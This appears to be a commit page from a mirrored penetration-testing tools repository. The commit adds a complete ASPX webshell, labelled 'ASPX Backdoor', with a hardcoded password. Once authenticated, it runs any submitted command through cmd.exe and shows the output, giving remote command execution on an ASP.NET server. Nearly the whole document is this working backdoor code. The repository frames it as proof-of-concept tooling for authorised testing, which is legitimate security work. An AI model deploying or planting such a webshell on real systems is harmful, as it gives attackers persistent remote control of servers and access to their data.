mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 10:31:38 +01:00
Added webshell.aspx
This commit is contained in:
mb
parent
15fd5b01ef
commit
f816f66aae
@ -141,6 +141,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA')
|
|||||||
|
|
||||||
- **`oRTC-leak-internal-ip.js`** - Internal IP address leakage via Object RTC (ORTC) interface implemented in Microsoft Edge. ([gist](https://gist.github.com/mgeeky/03f0871fb88c64b3d6d3a725c3ba38bf))
|
- **`oRTC-leak-internal-ip.js`** - Internal IP address leakage via Object RTC (ORTC) interface implemented in Microsoft Edge. ([gist](https://gist.github.com/mgeeky/03f0871fb88c64b3d6d3a725c3ba38bf))
|
||||||
|
|
||||||
|
- **`webshell.aspx`** - ASPX Backdoor / Webshell equipped with password-based authentication. To be used against ASP.NET applications during Penetration Testing assignments as a proof of concept.
|
||||||
|
|
||||||
- **`xml-attacks.md`** - XML Vulnerabilities and Attacks cheatsheet. ([gist](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870))
|
- **`xml-attacks.md`** - XML Vulnerabilities and Attacks cheatsheet. ([gist](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870))
|
||||||
|
|
||||||
|
|||||||
107
web/webshell.aspx
Executable file
107
web/webshell.aspx
Executable file
@ -0,0 +1,107 @@
|
|||||||
|
<%@ Page Language="C#" Debug="true" Trace="false" %>
|
||||||
|
<%@ Import Namespace="System.Diagnostics" %>
|
||||||
|
<%@ Import Namespace="System.IO" %>
|
||||||
|
<script Language="c#" runat="server">
|
||||||
|
|
||||||
|
// =====================================================================
|
||||||
|
// Setup global password necessary to pass before using that webshell.
|
||||||
|
|
||||||
|
public string Password = "5eQzrXZHZwJNLvm6Q2b7PR6r";
|
||||||
|
|
||||||
|
// =====================================================================
|
||||||
|
|
||||||
|
void Page_Load(object sender, EventArgs e)
|
||||||
|
{
|
||||||
|
PasswordTextbox.Attributes["value"] = Request.Form["PasswordTextbox"];
|
||||||
|
PasswordTextbox.Attributes["type"] = "password";
|
||||||
|
PasswordTextbox.Text = Request.Form["PasswordTextbox"];
|
||||||
|
CommandTextbox.Value = Request.Form["CommandTextbox"];
|
||||||
|
}
|
||||||
|
|
||||||
|
string ExcuteCommand(string arg)
|
||||||
|
{
|
||||||
|
if (arg.Length >= 1)
|
||||||
|
{
|
||||||
|
ProcessStartInfo psi = new ProcessStartInfo();
|
||||||
|
psi.FileName = "cmd.exe";
|
||||||
|
psi.Arguments = "/c \""+ arg + "\"";
|
||||||
|
psi.RedirectStandardOutput = true;
|
||||||
|
psi.UseShellExecute = false;
|
||||||
|
Process p = Process.Start(psi);
|
||||||
|
StreamReader stmrdr = p.StandardOutput;
|
||||||
|
string s = stmrdr.ReadToEnd();
|
||||||
|
stmrdr.Close();
|
||||||
|
return s;
|
||||||
|
}
|
||||||
|
return "";
|
||||||
|
}
|
||||||
|
|
||||||
|
void Launch_OnClick(object sender, System.EventArgs e)
|
||||||
|
{
|
||||||
|
if (Request.Form["PasswordTextbox"] == Password)
|
||||||
|
{
|
||||||
|
string h = Server.HtmlEncode(ExcuteCommand("hostname")).Trim();
|
||||||
|
string u = Server.HtmlEncode(ExcuteCommand("whoami")).Trim();
|
||||||
|
|
||||||
|
Hostname.Text = u + "@" + h;
|
||||||
|
CommandOutput.InnerHtml = Server.HtmlEncode(ExcuteCommand(Request.Form["CommandTextbox"]));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Hostname.Text = "unknown";
|
||||||
|
CommandOutput.InnerHtml = "Wrong password provided.";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
</script>
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>ASPX Backdoor</title>
|
||||||
|
<script>
|
||||||
|
function setPassword()
|
||||||
|
{
|
||||||
|
document.getElementById("PasswordTextbox").type = 'password';
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload='setPassword()'>
|
||||||
|
|
||||||
|
<h3>ASPX Backdoor.</h3>
|
||||||
|
<i style="font-size:9px">You need to provide valid password in order to leverage RCE.</i>
|
||||||
|
<br/>
|
||||||
|
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
|
||||||
|
<br/>
|
||||||
|
<hr/>
|
||||||
|
<form id="cmd" method="post" runat="server">
|
||||||
|
<table style="width:100%">
|
||||||
|
<tr>
|
||||||
|
<td width="40%">
|
||||||
|
<b style="color:red">Password:</b>
|
||||||
|
</td>
|
||||||
|
<td width="60%">
|
||||||
|
<asp:TextBox runat='server' id="PasswordTextbox" style="width:30%"></asp:TextBox>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="40%">
|
||||||
|
<b style="color:blue"></b>
|
||||||
|
<asp:Label id="Hostname" runat='server'></asp:Label>
|
||||||
|
</td>
|
||||||
|
<td width="60%">
|
||||||
|
<input type=text id="CommandTextbox" runat="server" value='' onClick="this.select();" style="width:80%" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }"/>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="40%">
|
||||||
|
</td>
|
||||||
|
<td width="60%">
|
||||||
|
<asp:Button id="Launch" runat="server" Text="Execute" OnClick="Launch_OnClick"></asp:Button>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</form>
|
||||||
|
<hr />
|
||||||
|
<pre id="CommandOutput" runat='server' style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"></pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
Loading…
Reference in New Issue
Block a user